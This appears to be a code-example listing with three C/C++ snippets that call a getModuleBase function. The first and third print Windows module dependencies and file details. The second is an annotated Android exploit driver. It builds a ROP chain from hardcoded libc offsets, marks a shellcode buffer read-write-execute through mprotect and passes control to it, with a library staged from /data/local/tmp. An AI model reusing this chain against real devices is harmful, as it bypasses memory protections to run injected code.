Esempio n. 1
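// Program entry point: parses the command line, builds the dependency list
// for g_pszPrimaryFile and prints one line per module, followed by the
// names of any modules that module imports but that could not be located.
//
// Returns 0 on success, 1 if the command line is rejected or the
// dependency list reports itself invalid.
int main( int argc, char * argv[] )
{
    if ( !ProcessCommandLine( argc, argv ) )
    {
        // sizeof yields size_t; passing it to %d is a format/argument
        // mismatch (undefined behaviour, visibly wrong on 64-bit builds),
        // so narrow it to int explicitly.
        const int nPointerBits = (int)( 8 * sizeof(void*) );

        printf( "%s %d bit build\n%s", argv[0], nPointerBits, g_szHelpSyntax );
        return 1;
    }

    MODULE_DEPENDENCY_LIST depends( g_pszPrimaryFile );

    if ( !depends.IsValid() )
    {
        printf( "Error: %s %s\n", g_pszPrimaryFile, depends.GetErrorString() );
        return 1;
    }

    PMODULE_FILE_INFO pModInfo = 0;

    // GetNextModule() is fed the previous entry and yields 0 at the end of
    // the list; the comparison is explicit so the assignment is not
    // mistaken for an equality test.
    while ( (pModInfo = depends.GetNextModule( pModInfo )) != 0 )
    {
        DisplayFileInformation( pModInfo, g_fQuiet );

        PMODULE_FILE_INFO pNotFound = 0;

        // Same iteration protocol for the per-module "not found" list.
        while ( (pNotFound = pModInfo->GetNextNotFoundModule( pNotFound )) != 0 )
        {
            LPCTSTR base = getModuleBase( pNotFound, g_fQuiet );

            // getModuleBase() may return 0; such entries are skipped.
            if ( base )
                printf( "  Not found: %s\n", base );
        }
    }

    return 0;
}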
Esempio n. 2
// Test driver: stages the file named by so_name in an ashmem region, then
// builds a table of addresses (ropData) and passes it to asmm_test().
//
// NOTE(review): getProcAddr, getModuleBase, get_so_buffer, get_shellcode and
// asmm_test are defined elsewhere. What asmm_test does with the table is not
// visible here -- presumably it transfers control through it; confirm.
// NOTE(review): none of the return values below are checked
// (get_so_buffer, ashmem_create_region, mmap, get_shellcode), so a failure in
// any of them leads to a NULL/MAP_FAILED dereference or a bad descriptor.
// NOTE(review): pointers are narrowed to uint32_t throughout, so the code is
// only meaningful in a 32-bit process.
// Defender's view: the table asks mprotect for read+write+execute on a page
// that holds writable data, and the library comes from /data/local/tmp.
// W^X enforcement (e.g. SELinux execmem/execheap denials) is the control
// that is meant to stop that mprotect step.
void shell_main(){

    // Resolve the loader entry points by name. dlsym_f is assigned but not
    // used anywhere else in this function.
    dlopen_t dlopen_f = (dlopen_t)getProcAddr(NULL,"dlopen");
    dlsym_t dlsym_f = (dlsym_t)getProcAddr(NULL,"dlsym");

    const char *so_name = "/data/local/tmp/testso.so";
    char *code = (char*)get_so_buffer(so_name); 
    // The first int of the returned buffer is taken as the region size.
    // NOTE(review): presumably get_so_buffer prefixes the image with its
    // length -- confirm; the memcpy below copies from the start of the
    // buffer, prefix included.
    int ashmem_len = *(int*)code;
    int fd_memory = ashmem_create_region("shmem", ashmem_len);
    ashmem_pin_region(fd_memory, 0, 0);
    // Shared read/write mapping of the ashmem region (no PROT_EXEC here).
    uint8_t *shm = (uint8_t*)mmap(NULL, ashmem_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd_memory, 0);
    printf("first map address is %p\n",shm);
    memcpy(shm,code,ashmem_len);
    // The staging buffer is released once copied; the data lives on in shm.
    free(code);
    //ashmem_unpin_region(fd_memory, 0, 0);

    // Four initialised entries, the remaining 28 are zero. The meaning of
    // the first three values is not visible here; the fourth is the ashmem
    // descriptor. A pointer to this array is placed in ropData below.
    int pos[32]={12,2,12,fd_memory};
    //shellcode(dlopen_f,pos);
    uint32_t libcbase = (uint32_t)getModuleBase("libc.so");
    uint32_t mprotect_address = (uint32_t)getProcAddr("libc.so","mprotect");
    uint32_t len = 0;
    // len is filled in by get_shellcode but not read again in this function.
    void *buffer = get_shellcode(&len);
    // Twelve initialised entries, the remaining 17 are zero:
    //   - two addresses at fixed offsets (0x15056, 0x4c8ee) from libc's base;
    //     these offsets are valid only for the one libc build they were
    //     taken from. NOTE(review): the "+1" looks like the ARM Thumb bit --
    //     confirm.
    //   - two 0xdeaddead filler words
    //   - buffer rounded down to a 4 KiB boundary, 4096, 0x7: the shape of an
    //     mprotect(addr, len, prot) argument triple, where 0x7 is
    //     PROT_READ|PROT_WRITE|PROT_EXEC on Linux
    //   - the addresses of mprotect and dlopen, the address of pos, the
    //     constant 2, and buffer+1
    uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,(uint32_t)pos,2,(uint32_t)buffer+1};
    //uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,1,2,(uint32_t)shellcode};
    asmm_test((uint32_t)ropData);
    // Reached only if asmm_test returns; the process then exits with -1.
    free(buffer);
    exit(-1);
}
Esempio n. 3
// Prints one report line for a module: its base name left-justified in a
// 14-character column, then -- each controlled by a global flag -- the
// file timestamp, the PE link timestamp and the full path in parentheses.
// After the newline, version information is shown when g_fShowVersion is set.
//
// Nothing is printed when getModuleBase() yields no name for the module.
void DisplayFileInformation( PMODULE_FILE_INFO pModInfo, BOOL bQuiet )
{
    LPCTSTR pszBase = getModuleBase( pModInfo, bQuiet );
    if ( 0 == pszBase )
        return;

    printf( "%-14s", pszBase );

    PSTR pszPath = pModInfo->GetFullName();

    if ( g_fShowDateTime )
    {
        // The file is opened read-only just long enough to query its
        // timestamp; an open failure silently omits the column.
        HFILE hOpened = _lopen( pszPath, OF_READ );
        if ( hOpened != HFILE_ERROR )
        {
            FILETIME ftWrite;

            if ( GetFileTime( (HANDLE)hOpened, 0, 0, &ftWrite ) )
            {
                char szDate[32] = { 0 };
                char szTime[32] = { 0 };

                GetFileDateAsString( &ftWrite, szDate, sizeof(szDate) );
                GetFileTimeAsString( &ftWrite, szTime, sizeof(szTime), TRUE );

                printf( "%s %s  ", szDate, szTime );
            }

            _lclose( hOpened );
        }
    }

    if ( g_fShowLinkDateTime )
    {
        FILETIME ftLink;
        char szDate[32] = { 0 };
        char szTime[32] = { 0 };

        // The link time comes from the PE header's TimeDateStamp, converted
        // to a FILETIME so the same formatting helpers can be reused.
        PE_EXE peImage( pszPath );

        TimeDateStampToFileTime( peImage.GetTimeDateStamp(), &ftLink );

        GetFileDateAsString( &ftLink, szDate, sizeof(szDate) );
        GetFileTimeAsString( &ftLink, szTime, sizeof(szTime), TRUE );

        printf( "%s %s  ", szDate, szTime );
    }

    if ( g_fShowFullPath )
    {
        printf( "(%s)", pszPath );
    }

    printf( "\n" );

    if ( g_fShowVersion )
    {
        ShowVersionInfo( pszPath );
    }
}